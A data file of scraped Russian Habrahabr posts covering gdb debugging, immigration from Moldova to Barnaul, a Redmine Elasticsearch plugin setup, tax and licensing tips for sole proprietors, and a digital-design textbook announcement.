Чтобы посмотреть подробнее текущую точку останова, можно воспользоваться командой: (gdb) list 1060 // Умножение по правилу «строка на столбец»
1061 for(row = 0; row < Params.Demension; row++)
1062 {
1063 for(col = 0; col < Params.Demension; col++)
1064 {
1065 Result[row][col] = 0;
Кто бы мог подумать. Пойду разбираться с индексами и выделенной памятью )) Чтобы узнать стек вызова, можно воспользоваться командой bt (gdb) bt #0 0x00000000004289f8 in MultiplyMatrixPackSpace (Result=0x26274ac, Matrix=0x2696340, CurPackSpace=0x7ffd81634020)
#1 0x0000000000428680 in CheckIndependancePS (CurPackSpace=0x7ffd81634020) at ./Pack_Polycubes.upc:1032
#2 0x0000000000428430 in AddIndependentPackSpace (CurPackSpace=0x7ffd81634020) at ./Pack_Polycubes.upc:1011
…
#8 0x0000000000427e21 in ExplorePackSpaces () at ./Pack_Polycubes.upc:922
#9 0x00000000004244c5 in user_main (argc=4, argv=0x7ffd816344e8) at ./Pack_Polycubes.upc:214...
Стек вызова нужно рассматривать с низу. Пользовательская программа начинается с user_main, далее последовательно идут вызовы и видно, в каком месте и с какими параметрами происходит ошибка.
Чтобы корректно выйти из отладки, необходимо продолжить дальше, после чего можно сделать quit . (gdb) continue Continuing.
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
Если по какой-то причине отладочные процессы зависли их можно убить с помощью команды kill из другого окна консоли, но в Росе получается проще с помощью Ctrl^C.
Наиболее востребованные команды gdb: break [file:]functiop — установить точку остановки на функции bt — вызвать стек print expr — вывести значение выражения с — продолжить выполнение программы next — выполнить следующую строчку программы (перепрыгнуть) step — шагнуть внутрь строчки программы list — просмотр текущей строчки останова help — вызвать помощь quit — выход
И как обычно, man gdb
Благодарю за внимание! Надеюсь, кому-нибудь пригодится | https://habrahabr.ru/post/317196/ |
habrahabr | Иммиграция в Россию | ['иммиграция'] |
На просторах рунета (и на этом ресурсе в частности) можно встретить бесчисленные истории об иммиграции россиян (и других выходцев из СНГ) в страны Европы, Азии, Африки или Америки. Однако, тем... |
На просторах рунета (и на этом ресурсе в частности) можно встретить бесчисленные истории об иммиграции россиян (и других выходцев из СНГ) в страны Европы, Азии, Африки или Америки. Однако, тем кому не сильно повезло с местом рождения, приходится выбирать другой путь. Ходит легенды, что для эмиграции в более развитые страны нужно иметь определенный бюджет, если только не эмигрировать по учебе или контракту с работодателем (да и то, даже в таком случае ехать с пустыми карманами не очень предусмотрительно). Откуда?
Из Молдовы (ну или Молдавии). Маленькая страна, зажатая между Украиной и Румынией, население 3,5 млн человек (по официальным данным, как оно на самом деле — неизвестно), проживающее преимущественно в сельской местности. Столица — Кишинёв, самый крупный город страны с населением чуть более 800000 человек. Средняя зарплата в стране — около 16000 рублей , жить можно, но смотря где. Интернет в городах развит и относительно дешевый, в сельской местности и частном секторе, чаще всего, рассчитывать можно только на хилый ADSL за дорого. Колоритность местного населения впечатляет — тут вам и русские, молдаване, румыны (либо настоящие румыны, либо румыно-молдаване), украинцы, гагаузы и многие другие. В политическом плане страна далеко не стабильная — замороженный конфликт на востоке страны , политические воззрения местного населения диаметрально противоположны почти в равном соотношении (одни — за СНГ и Таможенный Союз, вторые — за ЕС и евроинтеграцию). У власти долгое время сидели коммунисты, которых в 2009 году подвинули либерально-демократические партии, якобы взявшие курс на Евроинтеграцию. Недовольны местные жители и коммунистами, и коррумпированными либерало-демократами. Социальные службы развиты плохо и зачастую в новостях можно встретить вопиющие случаи коррупции, приводящие к ужасающим последствиям , или бесчеловечная халатность . Нет, всё не так плохо, как может показаться на первый взгляд — уверен, материалы подобного рода можно найти про любое место на планете. По сути, это всё, что можно интересного рассказать о стране отправления. Куда?
Россия. Думаю, в представлении для местной публики она не нуждается. Выбор на неё пал по трём причинам — отсутствие языкового барьера (как и многие мои сограждане, я владею и молдавским (или румынским) и русским языками в равной степени), бюджет (мои доходы на фрилансе в целом позволяли мне рассчитывать на нормальное существование в том месте, куда я собираюсь) и обстоятельства личного характера. Россия то понятно, а куда именно? — Россия ведь огромная. Волей не волей — в Барнаул, краевую столицу Алтайского Края. Город находится на юго-западе Сибири, население — чуть более 600000 человек. О ценах я узнал уже по прилету, и в целом расценки почти сопоставимы с расценками в столице Молдовы, но об этом позже. И какие впечатления?
Видал и получше — мог бы я сказать, поскольку был опыт долгого пребывания в других странах, с более развитой инфраструктурой и так далее. Однако, в целом, личные впечатления были положительными — сразу по прилету (это был сентябрь позапрошлого года) меня встретила суровая сибирская осень, со снегом и штормовым ветром. Зимы тут значительно холоднее, нежели на моей родине, лето относительно мягче (покуда в Молдове температура воздуха за лето может лишь изредка опускаться ниже 30-32 градусов). Будучи больше предрасположенным к умеренному лету, прохладе и дождю, мне климат сразу понравился. Местное население не вызвало никаких эмоций — менее смуглые, но примерно такие же люди, как и на родине. Архитектура (за исключением многочисленных построек прошлых веков, естественно, впечатляющих) города примерно такая же, как в столице Молдовы. В общем, период аккомодации и интеграции мне проходить не пришлось — будто и вовсе заграницу не выезжал, просто переехал из одного города в другой. И каково иностранцу?
Случаев ксенофобии я не встречал. Поскольку я свободно владею русским языком и внешностью мало чем отличаюсь от местного населения, взгляды прохожих я вовсе не ловил. Редкие моменты, когда я должен был показывать свой паспорт иностранного гражданина (чаще всего на кассе, при покупке чего-то эдакого), не вызывали у проверяющего никаких эмоций (разве что искали долго, где дату рождения смотреть). Сразу хочется отметить развитость банковской сферы по сравнению с Молдовой — спектр услуг куда более обширный, банков тоже больше. Стоит отметить, что в отличие от банков Молдовы в России крайне сложно переводить деньги за рубеж — если в приложении своего молдавского банка я могу указать номер карты любого банка мира и перевод тут же будет исполнен, в банках РФ (по крайней мере в Тинькофф и Сбербанке) альтернатива — банковский перевод. Инфраструктура развита лучше, медицина примерно одинакова (разве что выбор платных клиник куда больше). Случаи взяток (явных) или проявлений любой коррупции я не встречал, однако были некоторые неприятные моменты, как то отказ в оказании медицинской помощи в критическом состоянии (поводом стало тогдашнее отсутствие ОМС, хотя оказывать экстренную помощь обязаны и без него) или неофициальные поборы за быстрое прохождение очередей то там, то тут.
Отдельно хотелось бы рассказать про святыню всех иммигрантов в России — ФМС. Крайне неприятное место с огромными очередями и вечно нерабочими окошками. Для получения разрешения на временное проживание (РВП) пришлось сдать тест за 5000 рублей на знание русского языка, истории и законодательства РФ (тест можно осилить предварительными десятью минутами Гугла), сделать медицинскую справку (типичный обход вороха докторов, ставящих диагноз в зависимости от ответа на вопрос «здоровы?» и сдачей теста на ВИЧ) и заплатить ещё 5000 рублей, чтобы не стоять в 6 утра под окнами ФМС в надежде, что единственный талон, который они могут выдать в день, достанется не дюжинам других иммигрантам, а именно тебе. С РВП права иммигранта практически равняются с правами граждан России (за исключением выборов, естественно) — теперь можно претендовать на полис медицинского страхования, иметь равные возможности в трудоустройстве и т.д.
С работой здесь (в Барнауле) примерно так же, как и дома — платят немного, хотят много. PHP разработчик может рассчитывать на царские 25000 рублей в месяц (в конверте, разумеется), что при аренде однушки в 10000 выглядит крайне непривлекательно. Впрочем, гражданство работодателя не интересует никак — платить за иностранца ему придётся так же, как за сограждана, разницы никакой нет. Лично я избрал для себя путь фриланса, поскольку свободного времени он даёт больше, да и выходит в месяц куда более правдоподобные суммы, работая в комфортном темпе.
Был непродолжительный опыт работы в веб-студии (только ради интереса, т.к. бытует легенда, что так можно больше опыта получить, нежели фрилансом и самообучением). Ничего нового и интересного я не узнал — студия оказалась типичным штамповальным аппаратом сайтов — брали отнюдь не качеством, а тупо количеством, используя малоизвестные CMS. Это был мой единственный опыт работы в офисе, после которого желание приобщиться к планктону у меня отпало. Это вовсе не означает, что я считаю любую офисную работу плохой — уверен, работая в каком-либо Яндексе или в прогрессивной команде разработки можно и опыта набраться с три ведра, и карьеру неплохую сделать. Однако, чтобы претендовать на работу в подобных структурах, нужно что-то знать и что-то уметь. Вполне возможно, что рано или поздно я займусь углубленным самообучением и подтяну свои знания на достаточный уровень, чтобы можно было без стыда идти в «высший свет».
Отдельно следует учитывать, что мигранты должны подтверждать ежегодно проживание на территории РФ в течение более полугода (иначе РВП или ВНЖ могут аннулировать) а так же доход. Если есть официальное трудоустройство, через каждый год после получения соответствующего документа нужно будет брать справку 2-НДФЛ от работодателя, в случае отсутствия официальной работы — оформить ИП или платить налоги по 3-НДФЛ. Годовой доход должен быть не менее 12 прожиточных минимума (для Алтайского Края в октябре 2016 это было около 105к рублей, в других регионах свои ценники). Озаботиться этим вопросом следует заранее, иначе много нервов можно потратить, бегая между ФМС и налоговой. И что в итоге?
В целом, переезд в Россию имеет смысл, если вы недовольны своим нынешним местожительством и нет капитала/возможности перебраться в экономически развитые страны. Не исключаю, что в городах-миллиониках у иммигранта будут куда больше возможностей, чтобы обзавестись деньгами и прочими благами (увы, переезжать в Москву или даже тот же Новосибирск у меня желания никакого не было, с трудом переношу большую концентрацию людей на квадратный метр). Я намерено не затрагивал вопрос политики в РФ, поскольку не рассматриваю эту страну как место долговременного проживания и не вижу смысла обсуждать то, на что я никак не могу повлиять. В целом же, мигранту из СНГ Россия не должна показаться чем-то необычным — общий культурный фон и однородность обществ на постсоветском пространстве не даст ощущение чужбины, а при отсутствии языкового барьера и вовсе не будет ощущения пересечения границы.
Пост был написан отчасти ради того, чтобы разбавить цепь однообразных рассказов о переезде из России в третьи страны, отчасти из желания показать жителям РФ видение их страны в глазах приезжих. На абсолютную истину и тотальный объективизм я не претендую — уверен, у любого мигранта будет свой уникальный опыт знакомства с этой страной, но общая тенденция должна прослеживаться, на мой взгляд. | https://habrahabr.ru/post/317556/ |
habrahabr | Быстрый полнотекстовый поиск в Redmine | ['redmine', 'elasticsearch', 'plugin', 'fulltext search', 'полнотекстовый поиск'] |
У нас используется система управления проектами и задачами Redmine. Мы продолжаем допиливать ее под свои нужды, чтобы повысить удобство работы и расширить функционал. Очередной задачей стало... |
У нас используется система управления проектами и задачами Redmine . Мы продолжаем допиливать ее под свои нужды, чтобы повысить удобство работы и расширить функционал. Очередной задачей стало ускорение поиска.
С тех пор как количество задач в Redmine выросло до нескольких сотен тысяч, время на обработку поискового запроса стало занимать десятки секунд, что недопустимо долго для нас. Поэтому мы решили внедрить полнотекстовый поиск на основе Elasticsearch . Про это и будет данный пост.
Описывать, что такое Elasticsearch, для чего он нужен, как его установить и настроить, я не буду. Есть много статей на хабре (например раз , два , три ). Остановимся непосредственно на внедрении.
Среди списка плагинов был найден, казалось бы, полностью подходящий redmine_elasticsearch . Но оказалось, не все так просто: этот плагин уже пару лет не поддерживается и сильно устарел (в changelog последняя совместимость указана с Redmine 2.5.x). Однако задача поставлена, и надо ее решать. Опишу процедуру внедрения
Для работы плагина необходим ряд зависимостей. Во-первых, для выполнения фоновых задач по индексированию сущностей redmine_elasticsearch использует Resque. Но в нашем Redmine несколько плагинов уже использовали Sidekiq для этих задач, и подключать еще Resque не было смысла. Поэтому первым шагом мы заменили Resque на Sidekiq.
Во-вторых, для работы с Elasticsearch используется gem 'tire' , который устарел. Более того, все чаще рекомендуется использовать вместо него elasticsearch-rails . Это накладывает жесткое ограничение на версию еластика. Нам удалось добиться работоспособности, но только на версии 1.7.Х. Работу по замене tire мы не проводили и оставили на будущее.
В-третьих, для еластика необходимо два дополнительных плагина: Morphological Analysis Plugin for ElasticSearch
Mapper Attachments Type for Elasticsearch
С их установкой проблем не возникает. Теперь об установке
Ставится плагин стандартно. Клонируем код из репозитория в папку с плагинами. В нашем случае это выглядит так: git clone https://github.com/centosadmin/redmine_elasticsearch.git /opt/redmine/plugins
Ставим необходимые гемы: bundle install
Теперь нужно произвести индексирование всех сущностей Redmine. Это делается командой: bundle exec rake redmine_elasticsearch:reindex_all RAILS_ENV=production
Обратите внимание: процесс индексирования довольно длительный, в нашем случае он занял ~40 минут.
Стартуем Sidekiq для очереди с именем 'index_queue': sidekiq -q index_queue
Перезапускаем редмайн.
Все. Плагин готов к работе и заменяет стандартный поиск Redmine на полнотекстовый. Подведем итог
Мы, конечно, понимаем, что предстоит еще много работы по замене tire на elasticsearch-rails, чтобы устранить жесткую зависимость от версии еластика в будущем. Но найденное решение имеет право на существование и уже доказало свою работоспособность. После внедрения плагина скорость поиска сократилась до ~0.11–0.16 секунды против десятка секунд без него. Мы считаем, это отличный результат. И благодарные отзывы наших сотрудников подтверждают это мнение.
Надеюсь, статья будет вам полезна. Вопросы/замечания и предложения пишите в комментариях. Спасибо за внимание!
Ссылка на форк с нашими доработками: redmine_elasticsearch | https://habrahabr.ru/company/centosadmin/blog/317524/ |
habrahabr | 7 советов начинающему ИП, чтобы избежать проблем (что-то вы точно из этого не знаете) | ['регистрация ИП', 'регистрация бизнеса', 'свой бизнес', 'свое дело', 'усн', 'патент', 'налоговые каникулы', 'страховые взносы', 'роспотребнадзор', 'лицензирование'] |
После регистрации ИП в налоговой инспекции вы получаете не только право вести бизнес, т.е. заниматься предпринимательской деятельностью, но и обязанности, первейшие из которых — сдавать... | После регистрации ИП в налоговой инспекции вы получаете не только право вести бизнес, т.е. заниматься предпринимательской деятельностью, но и обязанности, первейшие из которых — сдавать отчётность и платить за себя страховые взносы. Помимо этих ключевых обязанностей каждого ИПешника есть ещё ряд нюансов, о которых стоит знать, чтобы не нарваться на штрафы в первый же месяц своей официальной деятельности. Специально для этой статьи мы отобрали семь важных вопросов, которые надо решить IT-фрилансеру сразу после госрегистрации.
А для тех, кто открыл ООО, мы подготовили: 10 вещей, которые обязательно нужно сделать после регистрации ООО 1. Выбрать правильную систему налогообложения Если при своей регистрации в качестве ИП вы не подавали уведомления о переходе на упрощённую систему налогообложения, то вам в течение ИКС времени после даты регистрации необходимо определиться с системой налогообложения. Система налогообложения – это порядок расчёта и оплаты налога. У каждой системы своя ставка и налоговая база, но главное, что существенно различаются суммы налога к уплате. Один из таких показательных примеров есть в статье « Сколько зарабатывает программист в Москве по мнению ФНС ». Всего систем налогообложения пять, но одна из них (ЕСХН) предназначена только для сельхозпроизводителей. Выбирать можно между основной (ОСНО) и специальными системами (УСН, ЕНВД, ПСН). В принципе, расчёт налоговой нагрузки — это бухгалтерская тема, поэтому если у вас есть знакомый грамотный специалист, то имеет смысл к нему обратиться. На коленке тоже можно кое-что подсчитать: на ОСНО надо платить 13% разницы между доходами и расходами плюс НДС;
при УСН Доходы налог составит 6% от дохода (в некоторых регионах ставка может доходить до 1%);
при УСН Доходы минус расходы – от 5% до 15% разницы между доходами и расходами (в некоторых регионах ставка может доходить до 1%);
стоимость патента выдаёт калькулятор ФНС ;
расчёт ЕНВД чуть сложнее, но реально справится самостоятельно .
Если вникать в расчёты не хочется, а до бухгалтера не добраться, рекомендуем вам подать заявление на УСН Доходы , т.к. это самая распространённая система налогообложения. Плюс к этому — самая простая система в плане отчётности с достаточно низкой налоговой нагрузкой. Её также можно совмещать с любыми другими системами, кроме ОСНО. (!) Из нашей рекомендации сразу переходить на УСН есть исключение — если вашими основными заказчиками будут бюджетные организации или крупный бизнес, то им нужен как раз ИП, работающий на ОСНО. Почему это важно : специальные (они же льготные) налоговые режимы позволяют снизить платежи в бюджет до минимума. Это право закреплено статьёй 21 НК РФ. Но если вы самостоятельно не подадите заявление о переходе на УСН, ЕНВД, ПСН, то никто вас уговаривать не станет. По умолчанию придётся работать на общей системе (ОСНО). О сроках отчётности своей системы забывать нежелательно, за несданную декларацию налоговики весьма быстро блокируют расчётный счёт ИП. Ещё одна причина вовремя сдавать налоговую отчётность – это риск получить от ПФР платёжку на сумму 154 852 рубля. Логика такова – раз вы о своих доходах в ИФНС не отчитались, то их размеры просто нескромны. Значит, взносы посчитают по максимуму (8МРОТ * 26% * 12). Это не штраф, деньги поступят на ваш пенсионный счёт и будут учитываться при расчёте пенсии (если к тому времени всё опять не поменяется), но всё равно сюрприз не самый приятный. 2. Воспользоваться налоговыми каникулами Если вы регистрируетесь в качестве ИП впервые после принятия регионального закона о налоговых каникулах, то можете претендовать на нулевую налоговую ставку на режимах УСН и ПСН. Не платить налог можно максимум два года. Конкретные виды деятельности, по которым установлены налоговые каникулы, определяет региональный закон. В Москве ИПешникам-разработчикам налоговых каникул не полагается, но если ваша деятельность связана с научными исследованиями и разработкой, то в большинстве регионов, включая Москву, вы можете получить нулевую налоговую ставку. С налоговыми каникулами в подробностях, а также с базой большинства региональных законов можно ознакомиться вот тут . Почему это важно: если есть возможность оказаться какое-то время в налоговой гавани, почему бы этим не воспользоваться? К тому же на ПСН в принципе нет возможности уменьшить стоимость патента на сумму взносов. А в рамках налоговых каникул патент ИП не будет вам ничего стоить. 3. Знать и платить за себя страховые взносы Страховые взносы – это платежи, которые каждый предприниматель обязан вносить за себя в пенсионный фонд (ПФР) и фонд обязательного медицинского страхования (ФОМС). С нового года сбором взносов займётся Федеральная налоговая служба, т.к. по мнению властей сами фонды со сбором платежей в свою пользу справляются плохо. Минимальная сумма взносов каждый год меняется. В 2016 году это около 23 тысяч рублей плюс 1% с доходов свыше 300 тысяч. Если вы были зарегистрированы в качестве ИП меньше года, то сумма соответственно пересчитывается. Взносы за себя надо платить всё то время, пока вы стоите на учёте, как предприниматель. Оправдания и аргументация вида: реальную деятельность не веду;
какой там бизнес, одни убытки;
за меня взносы платит работодатель по трудовой книжке;
я вообще-то на пенсии уже и пр.
в рассмотрение фондами не принимается. Не платить за себя взносы можно, если ИП призвали в армию или он ухаживает за ребенком до полутора лет, ребенком-инвалидом, инвалидом 1-ой группы, пожилыми людьми старше 80 лет. Но даже в этих случаях начисление взносов автоматически не прекращается, надо сначала представить документы, что реальным бизнесом вы не занимаетесь. Так что открывать ИП просто так, с расчётом, что когда-то может пригодиться, не стоит. Если в качестве ИП вы всё же зарегистрировались, а теперь находитесь в простое, то дешевле сняться с учёта (госпошлина составляет всего 160 р.), а при необходимости зарегистрировать снова. Количество подходов к стойке регистратора не ограничено. Почему это важно: взносы с вас всё равно взыщут, даже если ИП закроете. Плюс начислят штраф от 20% до 40% от неуплаченной суммы и пени. Кроме того, не выплачивая взносы в срок, вы лишаете себя возможности сразу уменьшать на эту сумму начисленный налог. Пример уменьшения выплат по УСН на страховые взносы ИП без работников на режиме УСН Доходы за 2016 год заработал 1 миллион рублей. Расходов по бизнесу у него не было (но если даже и были бы, то на УСН Доходы никакие расходы не учитываются). Сумма налога 1 000 000 * 6% = 60 000 рублей. Страховые взносы ИП за себя составили 30 153,33 рублей, из расчёта: взносы в ПФР — (6 204 * 12 * 26%) + ((1 000 000 – 300 000) * 1%) = (19 356,48 + 7 000) = 26 356,48 рублей.
взносы в ФОМС — 3 796,85 рублей из расчёта (6 204* 12 * 5,1%) при любом уровне доходов.
Предприниматель воспользовался правом уменьшить авансовые платежи по единому налогу на УСН за счёт выплаченных страховых взносов, поэтому платил их поквартально (*). Посчитаем общую сумму, которая ушла в бюджет в виде налога: 60 000 — 30 153,33 рублей (сумма уплаченных страховых взносов, на которую можно уменьшить налог) = 29 846,67 рубля. В результате, вся его налоговая нагрузка, включая страховые взносы, равна 60 000 рублей. Чистый доход от бизнеса индивидуального предпринимателя составляет 1 000 000 – 60 000 = 940 000 рублей. (*) Если вы заплатите взносы единой суммой в конце года, то сначала придётся заплатить полную сумму налога в 60 000 рублей, а потом подавать заявление в ИФНС о возврате или зачёте излишне уплаченного налога. Потому – лучше платить взносы частями каждый квартал, и сразу уменьшать квартальные авансовые платежи по УСН. По итогу выйдет то же самое, но в первом случае хлопот больше. 4. Подать уведомление о начале деятельности Мало кто это знает, но перед тем, как начать оказывать услуги по ремонту компьютеров и коммуникационного оборудования (коды ОКВЭД 95.11 и 95.12), ИП надо подать в местное отделение Роспотребнадзора уведомление о начале осуществления предпринимательской деятельности. Делается это для того, чтобы включить вас в план проверок Роспотребнадзора, хотя первые три года после регистрации ИП обещают не проверять. Но если на вас пожалуется клиент, недовольный качеством услуг, то проверка будет внеплановой. Кстати, с 1 января 2017 года Роспотребнадзор придёт с проверкой, только если клиент предоставит доказательства, что уже пытался призвать вас к ответу. Видимо, ведомство уже утомилось проверять реальность всех жалоб потребителей. Почему это важно: если не подать уведомление, то можно получить штраф от 3 до 5 тысяч рублей. Само по себе указание кодов ОКВЭД 95.11 и 95.12 при регистрации ИП не обязывает вас ни о чем сообщать. Подавать уведомление надо, только если вы реально планируете начать ремонтировать компьютеры и коммуникационное оборудование. 5. Открыть расчётный счёт Работать без расчётного счёта можно, если ваши клиенты – это физические лица, которые платят наличными, а вы заключаете договоры с другими ИП и ООО на суммы не более 100 тысяч рублей. Это лимит, который установил Центробанк на наличные расчёты между коммерческими субъектами. Превысить его довольно легко, ведь это не разовый платёж, а сумма расчётов в течение всего срока действия договора. Например, вы заключили договор аренды на год, арендная плата — 15 тысяч рублей в месяц. Общая сумма расчётов по договору составит 180 тысяч рублей, значит, оплата аренды допускается только безналом. Безналичные платежи в принципе удобны, не только потому что увеличивают количество способов оплаты, но и позволяют потребителю расплатиться с вами кредиткой, когда других свободных денег у него нет. Расчёты электронными деньгами можно легализовать, создав корпоративный кошелёк ИП. Почему это важно: за нарушение лимита наличных расчётов на ИП налагают штраф по статье 15.1 КоАП РФ (от 4 до 5 тысяч рублей). А о том, почему не стоит принимать платежи на свою личную карту, мы рассказали в статье 5 причин не использовать свой личный счёт в фрилансе . 6. Пройти регистрацию в качестве страхователя Если вы используете наёмный труд, то надо своевременно встать на учёт в качестве страхователя. Причём, вид договора с работником – трудовой или гражданско-правовой – не имеет значения. Даже если вы заключите разовый краткосрочный договор на выполнение каких-то услуг или работ с обычным физлицом, то становитесь страхователем. То есть, кроме выплаты вознаграждения исполнителю, обязаны за свой счёт выплатить за него страховые взносы, удержать и перечислить в бюджет НДФЛ и сдать отчётность. Обязанности страхователя по сдаче всевозможной отчётности по работникам или исполнителям весьма удручают – её действительно много, и она сложная. А с 2017 года основные функции по администрированию взносов передали ФНС, оставив тем не менее кое-какую отчётность за ПФР и ФСС. Почему это важно: сроки регистрации в качестве страхователя физических лиц в ПФР и ФСС — 30 дней со дня заключения первого трудового или гражданско-правового договора. Если срок нарушить или вообще не вставать на учёт, то Пенсионный фонд оштрафует на сумму от 5 до 10 тысяч, а соцстрах – от 5 до 20 тысяч рублей. С 2017 года порядок регистрации в ФСС остаётся тем же, а вместо ПФР заявление ИП-страхователя надо подавать в любой налоговый орган . 7. Получить лицензию, если ваш вид деятельности относится к лицензионным Лицензия — это разрешение на право заниматься определённым видом деятельности. В IT-сфере закон от 04.05.2011 № 99-ФЗ относит к лицензионным следующие направления: Разработка, производство, распространение шифровальных средств, информационных систем и телекоммуникационных систем, выполнение работ, оказание услуг, техобслуживание в этой области, за исключением собственных нужд организации или ИП;
Разработка, производство, реализация и приобретение в целях продажи специальных технических средств, предназначенных для негласного получения информации;
Деятельность по выявлению электронных устройств, предназначенных для негласного получения информации, за исключением собственных нужд организации или ИП;
Разработка и производство средств защиты, деятельность по технической защите конфиденциальной информации.
Лицензии выдаёт ФСБ, консультацию по вопросам лицензирования можно получить здесь . Почему это важно: за деятельность без лицензии или с нарушением ее условий могут взыскать административный штраф по статье 14.1 КоАП РФ (для ИП сумма от 3 до 5 тысяч рублей), допускается также конфискация изготовленной продукции, орудий производства и сырья. Если же в результате такой деятельности причинен крупный ущерб или получен доход в крупном размере, то возможна и уголовная ответственность. УК РФ, Статья 171. Незаконное предпринимательство 1. Осуществление предпринимательской деятельности без регистрации или без лицензии в случаях, когда такая лицензия обязательна, если это деяние причинило крупный ущерб гражданам, организациям или государству либо сопряжено с извлечением дохода в крупном размере, наказывается штрафом в размере до трехсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до двух лет, либо обязательными работами на срок до четырехсот восьмидесяти часов, либо арестом на срок до шести месяцев. 2. То же деяние: а) совершенное организованной группой; б) сопряженное с извлечением дохода в особо крупном размере, - наказывается штрафом в размере от ста тысяч до пятисот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от одного года до трех лет , либо принудительными работами на срок до пяти лет, либо лишением свободы на срок до пяти лет со штрафом в размере до восьмидесяти тысяч рублей или в размере заработной платы или иного дохода осужденного за период до шести месяцев либо без такового. Напоследок краткий обзор того, чего нельзя делать с ИП: ИП нельзя продать полностью как бизнес. Предприниматель может продать имущество, остатки товара, сырье, материалы и прочее. Покупатель, если он намерен дальше вести бизнес, должен быть зарегистрирован как ИП или ООО. Документы, где фигурирует имя предпринимателя-продавца (лицензии, разрешения, согласования, договоры и др.), придётся переоформить на нового собственника, а это не всегда просто.
ИП нельзя переименовать. Изменения в наименовании ИП допускаются, только если изменились паспортные данные самого физического лица. Например, при смене фамилии в браке. А просто так назваться другим именем или придумать звучный псевдоним/название нельзя. Можно зарегистрировать товарный знак или знак обслуживания, который использовать в рекламе, но в официальных документах ИП все равно будет фигурировать под полным именем физического лица.
Нельзя одновременно зарегистрировать два и более ИП. Регистрация предпринимателя осуществляется на его ИНН физлица, который не меняется за всю жизнь, независимо от смены имени. Если вы действующий предприниматель, налоговики это сразу увидят, поэтому в открытии нового ИП откажут. Хотите иметь несколько несвязанных бизнесов – регистрируйте компании, только надо остановиться на числе 10, после этого учредитель признается массовым .
ИП нельзя передать или получить в аренду. Это равносильно аренде паспорта или трудовой книжки. Предложения такие в интернете есть, причём, стараются убедить, что здесь всё в рамках закона: покажут копии или оригиналы свидетельства о регистрации ИП, выпишут доверенность и даже подпишут договор о совместной деятельности. Вот только такой договор вправе заключать коммерческие субъекты, а не физлица, поэтому юридической силы он не имеет. Всё, что вы заработаете, будет принадлежать «арендодателю», пытаться что-то доказать можно только через суд.
Если вы еще не ИПешник, но активно об этом размышляете, читайте нашу полную инструкцию по регистрации ИП со всеми лайфхаками. Также мы готовы бесплатно проконсультировать вас по выбору оптимальной системы налогообложения . Другие статьи из нашего блога на Хабре: Что выгоднее открыть разработчику: ИП или ООО?
Сколько зарабатывает программист в Москве по мнению ФНС
Нужны ли книжные советы начинающим предпринимателям?
Развеиваем мифы о том, что учредители не отвечают своим имуществом по долгам ООО
6 легальных способов и 1 сомнительный вывода денег учредителями из бизнеса
5 причин не использовать свой личный счёт в фрилансе
| https://habrahabr.ru/company/regberry/blog/317516/ |
habrahabr | Избранные места из популярного учебника микроэлектроники на русском, который наконец-то выходит на бумаге | ['asic', 'fpga', 'imagination technologies', 'роснано', 'учебники', 'микроэлектроника', 'харрис & харрис', 'nanometer asic'] | Год назад вышло бесплатное электронное издание на русском языке всеохватного вводного учебника Дэвида Харриса и Сары Харрис «Цифровая схемотехника и архитектура компьютера». Книга попала в струю,... | Год назад вышло бесплатное электронное издание на русском языке всеохватного вводного учебника Дэвида Харриса и Сары Харрис «Цифровая схемотехника и архитектура компьютера». Книга попала в струю, ее скачивания завалили британский сайт Imagination Technologies (дважды — 1 , 2 ), после чего учебник стали использовать преподаватели московских МФТИ, МГТУ, питерского ИТМО, киевского КНУ, КПИ и других вузов. Интересной особенностью учебника является то, что его перевод на русский сделала группа энтузиастов: преподавателей российских и украинских университетов, русских сотрудников компаний в Silicon Valley (AMD, Synopsys, Apple, NVidia ...) и российских компаний (НИИСИ, МЦСТ, Модуль ...).
При этом, электронное издание Харрис-энд-Харрис сформатировано для планшета, и уже после первых скачиваний посыпались емейлы, когда же учебник будет и на бумаге. И вот час настал — Учебник Дэвида Харриса и Сары Харрис «Цифровая схемотехника и архитектура компьютера» можно заказать на бумаге (выходит в новогоднюю ночь). В этом посте я покажу, чем этот учебник отличается от других. Бонус: фотки участников и участниц проекта!
Есть много учебников, которые хорошо вводят в цифровую логику на уровне триггеров и мультиплексоров, или в программирование готовых микроконтроллеров на ассемблере, или показывают красивые диаграммы процессорных конвейеров, или обучают синтаксису Verilog или VHDL. Но если учить скажем микроархитектуре без HDL, или если например пропускать уровни между триггером и программированием микроконтроллера, то получатся студенты, которые могут сдать экзамен и спорить умными словами в интернете, но ничего не могут сделать практически.
Учебник H&H решает эту проблему:
Например H&H шаг за шагом показывает, как построить простой микропроцессор:
Причем построить микропроцессор не абстрактно, а с его синтезируемым представлением на языках описания аппаратуры Verilog и VHDL.
Это представление на уровне регистровых передач (Register Transfer Level — RTL) можно превратить в микросхему на фабрике, или использовать для конфигурации недорогой студенческой платы с ПЛИС/FPGA:
Далее в учебнике обсуждается, как превратить такой простейший процессор в конвейерный:
И наконец учебник показывает куда копать дальше, например в сторону суперскалярных процессоров с внеочередным выполнением команд и переименованием регистров:
Если теперь перейти с уровня микроархитектуры на более низкий уровень, основ цифровой логики, то на нем H&H четко формулирует общие определения, частные случаи / исключения и приводит полезные для понимания упражнения:
Кроме логики и тайминга книжка иногда говорит и проблемах, привязанных к физике и вероятности, причем по делу и без растекания мысью по древу:
Краткость и четкость сохраняется при обсуждении правил писания кода на HDL на уровне регистровых передач:
Помимо обсуждения того, как конструировать цифровую логику, арифметические устройства и микропроцессорные ядра, в книге есть и глава про использование готовых микроконтроллерных чипов и присоединение к ним разнообразных устройств, вплоть до моторов. Иными словами, книга охватывает все от двоичных чисел и электронов до интерфейса к цупальцам человекоподобных роботов:
В учебнике есть даже пара слов про экономику бизнеса, использовать ли фиксированные микросхемы ASIC или гибкие FPGA, в зависимости от цикла жизни продукта:
Теперь несколько лиц переводчиков книги. Переводчиков было больше 40, их полный список есть в книге и некоторые фотографии были в предыдущих постах ( 1 , 2 ), но вот фотографии из последних встреч в Москве:
Юрий Панчул, инженер в Imagination Technologies (глава 7.8 + редактирование и администрирование)
и Илья Кудрявцев, декан Самарского национального исследовательского университета имени академика С.П. Королева (редактирование):
Студентки Ильи Кудрявцева: Анна Степашкина (главы 4.2 и 8.8) и Екатерина Степанова (8.4, 8.8.2-8.8.3, приложение А):
